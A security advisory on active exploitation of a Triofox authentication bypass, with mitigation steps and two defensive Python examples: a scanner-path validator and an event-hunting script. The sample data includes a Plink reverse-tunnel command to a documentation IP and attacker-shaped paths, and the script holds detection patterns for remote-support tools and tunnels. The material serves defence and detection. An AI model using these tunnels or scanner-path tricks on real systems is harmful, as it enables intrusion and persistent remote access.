
Gladinet Triofox n-day exploitation: technical summary and mitigation guidance

Google’s Mandiant Threat Defense recently disclosed active n-day exploitation of a critical vulnerability in Gladinet’s Triofox file-sharing and remote-access platform


Google’s Mandiant Threat Defense recently disclosed active n-day exploitation of a critical vulnerability in Gladinet’s Triofox file-sharing and remote-access platform. The flaw, CVE-2025-12480 (CVSS 9.1), lets an unauthenticated attacker reach Triofox’s administration and configuration pages, create a privileged application account, upload arbitrary files and turn that into code execution on the host. Mandiant observed a threat cluster tracked as UNC6485 weaponizing the defect in late August 2025, after patches were already available. That makes it an n-day in the strict sense: the fix existed, and the victims had simply not applied it.

How the attack works (technical flow)

  1. Unauthenticated access — The vulnerability lets an attacker reach Triofox’s initial setup and configuration pages, which are supposed to be unreachable once installation has completed. No Triofox credentials are required at this stage.

  2. Create admin account — Through that setup flow the attacker creates a new native (Triofox-local, not Active Directory) administrator account; in the observed intrusion it was named “Cluster Admin”.

  3. Abuse antivirus configuration — Triofox lets an administrator specify the path of the antivirus scanner it runs against files. The attacker points that setting at a batch script they have already uploaded to the server. Because the scanner is launched by the Triofox parent process, which runs as SYSTEM, the next scan executes the attacker’s script as SYSTEM. No memory-corruption bug is needed: the product executes whatever path it is given.

  4. Payload delivery & persistence — In the campaign Mandiant observed, the batch script downloaded a Zoho UEMS (Unified Endpoint Management and Security) installer from a remote host and used it to deploy legitimate remote-access tools (Zoho Assist, AnyDesk). Because these are commercial support products, they give the actor persistent, interactive access that blends in with ordinary IT traffic and is used for reconnaissance and follow-on actions.

  5. Lateral movement & tunneling — The actors then attempted to extend their privileges by adding accounts to the local Administrators and Domain Admins groups, and used Plink/PuTTY to open an encrypted SSH connection to their own infrastructure carrying a tunnel for RDP. Because the SSH session is initiated from the victim, the attacker’s RDP traffic rides an outbound connection and never has to pass an inbound firewall rule.
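To make the scanner-path primitive in step 3 concrete, and to show what “validated binaries only” (item 3 of the recommended actions below) has to mean in code, here is an added example. It is not Gladinet’s code: the configuration key `antivirus_path`, the function names, the allow-list contents and every sample path are assumptions made for illustration. The “before” function launches whatever is configured; the “after” function refuses anything that is not a known scanner binary in a trusted install directory.

```python
"""Models the Triofox antivirus-scanner weakness: an attacker-controlled
path is executed by the SYSTEM-level service.  Added example, not Gladinet
code.  The configuration key ``antivirus_path``, the function names, the
allow-list and every sample path are assumptions made for illustration."""
import ntpath

# Script extensions and interpreters an attacker would point the setting at.
SCRIPT_EXTENSIONS = {".bat", ".cmd", ".ps1", ".vbs", ".js", ".wsf", ".hta"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Assumed allow-list: directories a properly installed scanner lives in,
# and the exact binaries an operator has validated (lower-cased for comparison).
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")
APPROVED_SCANNERS = {"c:\\program files\\windows defender\\mpcmdrun.exe"}


def vulnerable_scan_command(config, target_file):
    """Before: whatever is configured is launched, under the service's
    SYSTEM privileges, with no check at all."""
    return [config["antivirus_path"], target_file]


def validate_scanner_path(path):
    """Return (ok, reason).  Only an approved scanner binary passes."""
    norm = ntpath.normpath(path).lower()      # collapses '..' segments
    name = ntpath.basename(norm)
    ext = ntpath.splitext(name)[1]
    if ext in SCRIPT_EXTENSIONS:
        return False, f"script extension {ext}"
    if name in INTERPRETERS:
        return False, f"interpreter {name}"
    if not norm.startswith(TRUSTED_ROOTS):    # also rejects UNC paths
        return False, "outside trusted install directories"
    if norm not in APPROVED_SCANNERS:
        return False, "not on the approved scanner allow-list"
    return True, "approved"


def hardened_scan_command(config, target_file):
    """After: refuse to launch anything that fails validation."""
    path = config["antivirus_path"]
    ok, reason = validate_scanner_path(path)
    if not ok:
        raise ValueError(f"refusing to run scanner {path!r}: {reason}")
    return [path, target_file]


if __name__ == "__main__":
    # Constructed configurations: one legitimate, three attacker-shaped.
    samples = [
        {"antivirus_path": r"C:\Program Files\Windows Defender\MpCmdRun.exe"},
        {"antivirus_path": r"C:\Users\Public\centre_report.bat"},  # constructed location
        {"antivirus_path": r"C:\Program Files\Windows Defender\..\..\Users\Public\evil.exe"},
        {"antivirus_path": r"\\198.51.100.7\share\scanner.exe"},
    ]
    for cfg in samples:
        print("vulnerable:", vulnerable_scan_command(cfg, r"C:\upload\file.docx"))
        try:
            print("hardened:  ", hardened_scan_command(cfg, r"C:\upload\file.docx"))
        except ValueError as exc:
            print("hardened:  ", exc)
```

The order of the checks matters less than the last one: the allow-list is what actually closes the hole, because a traversal or UNC trick that slips past the extension and directory tests still has to name an exact, operator-approved binary. In a real deployment the approved entry would also carry a code-signing or hash check, which this example leaves out.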

Observed objectives and TTPs

  • Initial foothold via unauthenticated admin pages.

  • Code execution as SYSTEM, followed by attempts to acquire local and domain administrator privileges.

  • Use of legitimate remote-support software for stealth and persistence.

  • Encrypted tunneling to evade network detections and enable inbound RDP.

Recommended actions (prioritized)

  1. Patch immediately — Upgrade every Triofox instance to the vendor’s fixed release or later and confirm the running build number after the upgrade. Treat disclosed Triofox CVEs as high priority: the product is internet-facing by design, and this campaign shows the exploitation window opening after the patch was out.

  2. Audit accounts — Review Triofox’s native administrator accounts as well as Windows local and domain accounts created or modified recently; remove any you cannot tie to a change record. A setup-flow account such as “Cluster Admin” that nobody remembers creating is a strong compromise signal.

  3. Verify antivirus paths — Confirm the Triofox antivirus/scanner setting points only to a validated scanner binary in its vendor’s install directory, never to a script, interpreter, network share or user-writable location. The patch closes the authentication bypass but does not remove the setting, so any future admin-level compromise can reuse the same SYSTEM-execution primitive; alert on changes to it.

  4. Hunt for indicators — Look for new admin accounts, unexpected Zoho UEMS/Zoho Assist or AnyDesk installs, any reference to centre_report.bat, shells spawned by the Triofox service process, outbound connections to IPs you cannot attribute, and recent use of Plink/PuTTY (especially with port-forwarding arguments).

  5. Isolate and remediate — If compromise is suspected, isolate hosts, collect forensic artifacts, rotate credentials, and rebuild from known-good images where necessary.

  6. Network controls — Restrict outbound SSH from servers regardless of destination port (a tunnel on an unusual port still looks like SSH on the wire) and block unusual remote-management ports; enforce egress filtering and keep EDR monitoring on the Triofox host.
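The hunting list in item 4 translates directly into a small set of rules over Windows Security and process-creation events. The following is an added example, not Mandiant’s or Gladinet’s tooling: the flat dict-per-event schema, the sample records (the Triofox service path, account names, file locations and the 198.51.100.7 documentation address) and the process-name patterns are all constructed assumptions derived from the indicators named in this post. It runs offline against the embedded sample and reports which rule each record tripped.

```python
"""Runs the hunting checks from the list above over constructed Windows
event records.  Added example, not Mandiant's or Gladinet's tooling: the
flat dict-per-event schema, the sample records and the process-name
patterns are assumptions built from the indicators named in this post."""
import re

PRIVILEGED_GROUPS = {"Administrators", "Domain Admins"}
# Assumed patterns: Triofox install-path fragment, the batch file named in the
# report, the remote-support tools, and a Plink/PuTTY reverse tunnel (-R).
TRIOFOX_PARENT = re.compile(r"triofox|gladinet", re.I)
SHELL_IMAGE = re.compile(r"\\(cmd|powershell|pwsh)\.exe$", re.I)
SCRIPT_IOC = re.compile(r"centre_report\.bat", re.I)
REMOTE_TOOLS = re.compile(r"anydesk|zoho|uems", re.I)
REVERSE_TUNNEL = re.compile(r"\b(plink|putty)\b.*\s-R\s", re.I)

# Constructed sample: Security 4720/4732 and 4688 process-creation records.
SAMPLE_EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Program Files (x86)\Triofox\service.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\Public\centre_report.bat"'},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\Temp\plink.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"plink.exe -ssh -R 13389:127.0.0.1:3389 -P 443 op@198.51.100.7"},
    {"EventID": 4720, "SubjectUserName": "SYSTEM", "TargetUserName": "svc_backup"},
    {"EventID": 4732, "MemberName": r"CORP\svc_backup", "TargetUserName": "Administrators"},
    {"EventID": 4688, "NewProcessName": r"C:\Users\Public\AnyDesk.exe",
     "ParentProcessName": r"C:\Windows\Temp\UEMS_agent.exe",
     "CommandLine": "AnyDesk.exe --install --start-with-win --silent"},
    # Benign noise that must not fire.
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\svchost.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"EventID": 4732, "MemberName": r"CORP\jdoe", "TargetUserName": "Remote Desktop Users"},
]


def hunt(events):
    """Return (rule, detail) tuples for records matching the campaign's TTPs."""
    findings = []
    for e in events:
        eid = e.get("EventID")
        if eid == 4720:                                   # account created
            findings.append(("new_account", e["TargetUserName"]))
        elif eid in (4728, 4732) and e.get("TargetUserName") in PRIVILEGED_GROUPS:
            findings.append(("privileged_group_add",
                             f"{e['MemberName']} -> {e['TargetUserName']}"))
        elif eid == 4688:                                 # process created
            image = e.get("NewProcessName", "")
            parent = e.get("ParentProcessName", "")
            cmd = e.get("CommandLine", "")
            if TRIOFOX_PARENT.search(parent) and SHELL_IMAGE.search(image):
                findings.append(("triofox_spawned_shell", cmd))
            if SCRIPT_IOC.search(cmd):
                findings.append(("centre_report_bat", cmd))
            if REVERSE_TUNNEL.search(cmd):
                findings.append(("ssh_reverse_tunnel", cmd))
            if REMOTE_TOOLS.search(image) or REMOTE_TOOLS.search(cmd):
                findings.append(("remote_support_tool", image))
    return findings


def rules_fired(events):
    """Distinct rule names that matched, sorted, for a quick triage summary."""
    return sorted({rule for rule, _ in hunt(events)})


if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The rule worth keeping even after the indicator-specific ones age out is `triofox_spawned_shell`: the Triofox service has no legitimate reason to launch cmd.exe or PowerShell, so a child shell under that parent is a durable signal for this primitive regardless of what the batch file is called or where it was uploaded.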

Final note

This campaign is a reminder that n-day exploitation is a persistent threat: timely patching, rigorous configuration hardening, and proactive account auditing dramatically reduce exposure to such post-disclosure attacks.